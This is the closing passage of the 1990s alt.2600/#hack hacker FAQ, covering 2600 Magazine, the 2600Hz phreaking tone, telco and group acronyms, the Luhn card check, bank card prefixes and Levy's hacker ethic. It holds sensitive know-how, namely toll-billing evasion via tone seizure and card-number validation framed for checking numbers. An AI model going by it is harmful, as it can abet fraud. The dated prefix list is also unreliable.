  4880. Section D: 2600
  4881. ~~~~~~~~~~~~~~~
  4882.  
  4883. 01. What is alt.2600?
  4884.  
  4885. Alt.2600 is a Usenet newsgroup for discussion of material relating to
  4886. 2600 Magazine, the hacker quarterly.   It is NOT for the Atari 2600
  4887. game machine.  Len@netsys.com created the group on Emmanuel
  4888. Goldstein's recommendation.  Emmanuel is the editor/publisher of 2600
  4889. Magazine. Following the barrage of postings about the Atari machine to
  4890. alt.2600, an alt.atari.2600 was created to divert all of the atari
  4891. traffic from alt.2600.  Atari 2600 people are advised to hie over to
  4892. rec.games.video.classic.
  4893.  
  4894.  
  4895. 02. What does "2600" mean?
  4896.  
  4897.         2600Hz was a tone that was used by early phone phreaks (or
  4898. phreakers) in the 80's, and some currently.  If the tone was sent down the
  4899. line at the proper time, one could get away with all sorts of fun stuff.
  4900.  
  4901. A note from Emmanuel Goldstein:
  4902.         
  4903. "The Atari 2600 has NOTHING to do with blue boxes or telephones
  4904. or the 2600 hertz tone.  The 2600 hertz tone was simply the first
  4905. step towards exploring the network.  If you were successful at
  4906. getting a toll call to drop, then billing would stop at that
  4907. point but there would be billing for the number already dialed
  4908. up until the point of seizure.  800 numbers and long distance
  4909. information were both free in the past and records of who called
  4910. what were either non-existent or very obscure with regards to
  4911. these numbers.  This, naturally, made them more popular than
  4912. numbers that showed up on a bill, even if it was only for
  4913. a minute.  Today, many 800 numbers go overseas, which provides
  4914. a quick and free way into another country's phone system
  4915. which may be more open for exploration."
  4916.  
  4917.  
  4918. 03. Are there on-line versions of 2600 available?
  4919.  
  4920.         No.
  4921.  
  4922.  
  4923. 04. I can't find 2600 at any bookstores.  What can I do?
  4924.  
  4925. Subscribe.  Or, let 2600 know via the subscription address that you
  4926. think 2600 should be in the bookstore.  Be sure to include the
  4927. bookstores name and address.
  4928.  
  4929.  
  4930. 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  4931.  
  4932. A note from Emmanuel Goldstein:
  4933.  
  4934.   We've been selling 2600 at the same newsstand price ($4) since 1988
  4935.   and we hope to keep it at that price for as long as we can get away
  4936.   with it. At the same time, $21 is about the right price to cover
  4937.   subscriber costs, including postage and record keeping, etc. People
  4938.   who subscribe don't have to worry about finding an issue someplace,
  4939.   they tend to get issues several weeks before the newsstands get
  4940.   them, and they can take out free ads in the 2600 Marketplace.
  4941.  
  4942.   This is not uncommon in the publishing industry.  The NY Times, for
  4943.   example, costs $156.50 at the newsstands, and $234.75 delivered to your
  4944.   door.
  4945.  
  4946.  
  4947.  
  4948.  
  4949. Section E: Miscellaneous
  4950. ~~~~~~~~~~~~~~~~~~~~~~~~
  4951.  
  4952. 01. What does XXX stand for?
  4953.  
  4954. TLA     Three Letter Acronym
  4955.  
  4956. ACL     Access Control List
  4957. PIN     Personal Identification Number
  4958. TCB     Trusted Computing Base
  4959.  
  4960. ALRU    Automatic Line Record Update
  4961. AN      Associated Number
  4962. ARSB    Automated Repair Service Bureau
  4963. ATH     Abbreviated Trouble History
  4964. BOC     Bell Operating Company
  4965. BOR     Basic Output Report
  4966. BOSS    Business Office Servicing System
  4967. CA      Cable
  4968. COE     Central Office Equipment
  4969. COSMOS  Computer System for Main Frame Operations
  4970. CMC     Construction Maintenance Center
  4971. CNID    Calling Number IDentification
  4972. CO      Central Office
  4973. COCOT   Customer Owned Coin Operated Telephone
  4974. CRSAB   Centralized Repair Service Answering Bureau
  4975. DDD     Direct Distance Dialing
  4976. ECC     Enter Cable Change
  4977. LD      Long Distance
  4978. LMOS    Loop Maintenance Operations System
  4979. MLT     Mechanized Loop Testing
  4980. NPA     Numbering Plan Area
  4981. POTS    Plain Old Telephone Service
  4982. RBOC    Regional Bell Operating Company
  4983. RSB     Repair Service Bureau
  4984. SS      Special Service
  4985. TAS     Telephone Answering Service
  4986. TH      Trouble History
  4987. TREAT   Trouble Report Evaluation and Analysis Tool
  4988.  
  4989. LOD     Legion of Doom
  4990. HFC     Hell Fire Club
  4991. TNO     The New Order
  4992.  
  4993. ACiD    Ansi Creators in Demand
  4994. CCi     Cybercrime International
  4995. FLT     Fairlight
  4996. iCE     Insane Creators Enterprise
  4997. iNC     International Network of Crackers
  4998. NTA     The Nocturnal Trading Alliance
  4999. PDX     Paradox
  5000. PE      Public Enemy
  5001. PSY     Psychose
  5002. QTX     Quartex
  5003. RZR     Razor (1911)
  5004. S!P     Supr!se Productions
  5005. TDT     The Dream Team
  5006. THG     The Humble Guys
  5007. THP     The Hill People
  5008. TRSI    Tristar Red Sector Inc.
  5009.  
  5010.  
  5011. 02. How do I determine if I have a valid credit card number?
  5012.  
  5013. Credit cards use the Luhn Check Digit Algorithm.  The main purpose of
  5014. this algorithm is to catch data entry errors, but it does double duty
  5015. here as a weak security tool.
  5016.  
  5017. For a card with an even number of digits, double every odd numbered
  5018. digit and subtract 9 if the product is greater than 9.  Add up all the
  5019. even digits as well as the doubled-odd digits, and the result must be
  5020. a multiple of 10 or it's not a valid card.  If the card has an odd
  5021. number of digits, perform the same addition doubling the even numbered
  5022. digits instead.
  5023.  
  5024.  
  5025. 03. What bank issued this credit card?
  5026.  
  5027. 1033    Manufacturers Hanover Trust
  5028. 1035    Citibank
  5029. 1263    Chemical Bank
  5030. 1665    Chase Manhattan
  5031. 4024    Bank of America
  5032. 4128    Citicorp
  5033. 4209    New Era Bank
  5034. 4302    HHBC
  5035. 4310    Imperial Savings
  5036. 4313    MBNA
  5037. 4317    California Federal
  5038. 5282    Wells Fargo
  5039. 5424    Citibank
  5040. 5410    Wells Fargo
  5041. 5432    Bank of New York
  5042. 6017    MBNA
  5043.  
  5044.  
  5045. 04. What are the ethics of hacking?
  5046.  
  5047. The FAQ answer is excerpted from: Hackers: Heroes of the Computer Revolution
  5048.                                   by Steven Levy
  5049.  
  5050. Access to computers -- and anything which might teach you something
  5051. about the way the world works -- should be unlimited and total.
  5052. Always yield to the Hands-On imperative.
  5053.  
  5054. All information should be free.
  5055.  
  5056. Mistrust Authority.  Promote Decentralization.
  5057.  
  5058. Hackers should be judged by their hacking, not bogus criteria such as
  5059. degrees, age, race, or position.
  5060.  
  5061. You can create art and beauty on a computer.
  5062.  
  5063. Computers can change your life for the better.
  5064.  
  5065.  
  5066. 04. Where can I get a copy of the alt.2600/#hack FAQ?
  5067.  
  5068. Get it on FTP at:
  5069. rahul.net /pub/lps
  5070. rtfm.mit.edu /pub/usenet-by-group/alt.2600
  5071.  
  5072. Get it on the World Wide Web at:
  5073. http://dfw.net/~aleph1
  5074. http://www.engin.umich.edu/~jgotts/hack-faq.html
  5075. http://www.phantom.com/~king
  5076.  
  5077. Get it by E-Mail at:
  5078. hackfaq@sekurity.com  (Subject: send faq)
  5079.  
  5080.  
  5081.  
  5082.  
  5083. EOT
  5084.  
  5085.